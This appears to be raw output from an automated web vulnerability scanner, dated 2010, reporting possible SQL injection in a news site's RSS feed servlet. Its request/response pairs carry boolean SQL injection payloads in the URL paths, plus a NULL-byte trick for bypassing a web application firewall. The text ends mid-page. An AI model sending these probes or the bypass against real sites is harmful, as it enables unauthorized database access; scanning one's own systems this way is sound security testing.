<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /mngi'%20and%201%3d2--%20/rss/CustomRssServlet/568/200746.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Pragma: no-cache Content-Type: text/html Cache-Control: no-cache Expires: Tue, 07 Dec 2010 23:18:57 GMT Date: Tue, 07 Dec 2010 23:18:57 GMT Content-Length: 424 Connection: close
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error. </BODY></HTML>
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 23993338%20or%201%3d1--%20 and 23993338%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet/56823993338%20or%201%3d1--%20/200746.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Content-Type: text/html Date: Tue, 07 Dec 2010 23:19:03 GMT Content-Length: 0 Connection: close
Request 2
GET /mngi/rss/CustomRssServlet/56823993338%20or%201%3d2--%20/200746.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:19:03 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 18638958%20or%201%3d1--%20 and 18638958%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet/56818638958%20or%201%3d1--%20/200747.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Content-Type: text/html Date: Tue, 07 Dec 2010 23:19:09 GMT Content-Length: 0 Connection: close
Request 2
GET /mngi/rss/CustomRssServlet/56818638958%20or%201%3d2--%20/200747.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:19:09 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /mngi/rss/CustomRssServlet/568/200747.xml%00' HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 400 Bad Request Content-Type: text/html Content-Length: 34 Expires: Tue, 07 Dec 2010 23:19:12 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Tue, 07 Dec 2010 23:19:12 GMT Connection: close
<h1>Bad Request (Invalid URL)</h1>
Request 2
GET /mngi/rss/CustomRssServlet/568/200747.xml%00'' HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi'%20and%201%3d1--%20/rss/CustomRssServlet/568/200748.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:19:18 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /mngi'%20and%201%3d2--%20/rss/CustomRssServlet/568/200748.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Pragma: no-cache Content-Type: text/html Cache-Control: no-cache Expires: Tue, 07 Dec 2010 23:19:19 GMT Date: Tue, 07 Dec 2010 23:19:19 GMT Content-Length: 424 Connection: close
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error. </BODY></HTML>
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet/568%20and%201%3d1--%20/200748.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Content-Type: text/html Date: Tue, 07 Dec 2010 23:19:29 GMT Content-Length: 0 Connection: close
Request 2
GET /mngi/rss/CustomRssServlet/568%20and%201%3d2--%20/200748.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:19:29 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /mngi/rss/CustomRssServlet/568/200748.xml%00' HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 400 Bad Request Content-Type: text/html Content-Length: 34 Expires: Tue, 07 Dec 2010 23:19:33 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Tue, 07 Dec 2010 23:19:33 GMT Connection: close
<h1>Bad Request (Invalid URL)</h1>
Request 2
GET /mngi/rss/CustomRssServlet/568/200748.xml%00'' HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi'%20and%201%3d1--%20/rss/CustomRssServlet/568/200749.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:19:12 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /mngi'%20and%201%3d2--%20/rss/CustomRssServlet/568/200749.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Pragma: no-cache Content-Type: text/html Cache-Control: no-cache Expires: Tue, 07 Dec 2010 23:19:12 GMT Date: Tue, 07 Dec 2010 23:19:12 GMT Content-Length: 424 Connection: close
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error. </BODY></HTML>
The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /mngi/rss/CustomRssServlet/568/200749.xml%00' HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 400 Bad Request Content-Type: text/html Content-Length: 34 Expires: Tue, 07 Dec 2010 23:19:27 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Tue, 07 Dec 2010 23:19:27 GMT Connection: close
<h1>Bad Request (Invalid URL)</h1>
Request 2
GET /mngi/rss/CustomRssServlet/568/200749.xml%00'' HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 65316758'%20or%201%3d1--%20 and 65316758'%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet/56865316758'%20or%201%3d1--%20/200750.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Content-Type: text/html Date: Tue, 07 Dec 2010 23:19:20 GMT Content-Length: 0 Connection: close
Request 2
GET /mngi/rss/CustomRssServlet/56865316758'%20or%201%3d2--%20/200750.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:19:21 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /mngi/rss/CustomRssServlet%00'/568/200753.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 400 Bad Request Content-Type: text/html Content-Length: 34 Date: Tue, 07 Dec 2010 23:19:27 GMT Connection: close
<h1>Bad Request (Invalid URL)</h1>
Request 2
GET /mngi/rss/CustomRssServlet%00''/568/200753.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Content-Type: text/html Date: Tue, 07 Dec 2010 23:19:27 GMT Content-Length: 0 Connection: close
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 47711278%20or%201%3d1--%20 and 47711278%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet/56847711278%20or%201%3d1--%20/200753.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Content-Type: text/html Date: Tue, 07 Dec 2010 23:19:31 GMT Content-Length: 0 Connection: close
Request 2
GET /mngi/rss/CustomRssServlet/56847711278%20or%201%3d2--%20/200753.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:19:31 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 87447082'%20or%201%3d1--%20 and 87447082'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi87447082'%20or%201%3d1--%20/rss/CustomRssServlet/568/200754.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:19:26 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
